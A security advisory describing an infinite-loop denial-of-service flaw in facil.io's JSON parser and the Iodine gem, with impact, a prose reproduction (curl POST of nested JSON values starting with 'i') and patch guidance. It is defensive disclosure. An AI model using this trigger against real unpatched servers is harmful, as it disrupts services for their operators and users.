Facil.io and Iodine JSON Parser Infinite Loop Vulnerability Leading to Denial-of-Service

A denial-of-service vulnerability has been identified in facil.io, a C micro-framework for web applications, and in the Iodine Ruby gem, which vendors the same JSON parser code. The issue arises in the JSON parsing function 'fio_json_parse', which can enter an infinite loop when it encounters a nested JSON value starting with 'i' or 'I'. Instead of returning a parse error, the process consumes nearly 100% of one CPU core. This vulnerability is present in facil.io versions prior to the patch commit and in Iodine versions through 0.7.58.

Impact

Exploitation of this vulnerability leads to an infinite loop in the JSON parser, causing high CPU usage on one core. This can disrupt application performance, especially in multi-threaded or multi-worker environments, where a single request can tie up resources until manually terminated.

Reproduction

The vulnerability can be reproduced in facil.io by sending a POST request with a 'Content-Type' of 'application/json' that includes a nested value starting with 'i' or 'I'. This can be done using curl. The issue can also be reproduced in an Iodine HTTP server by sending the same type of JSON payloads.

Remediation

Users of facil.io should update to the version that includes the patch for this vulnerability. Iodine users should update to version 0.7.59.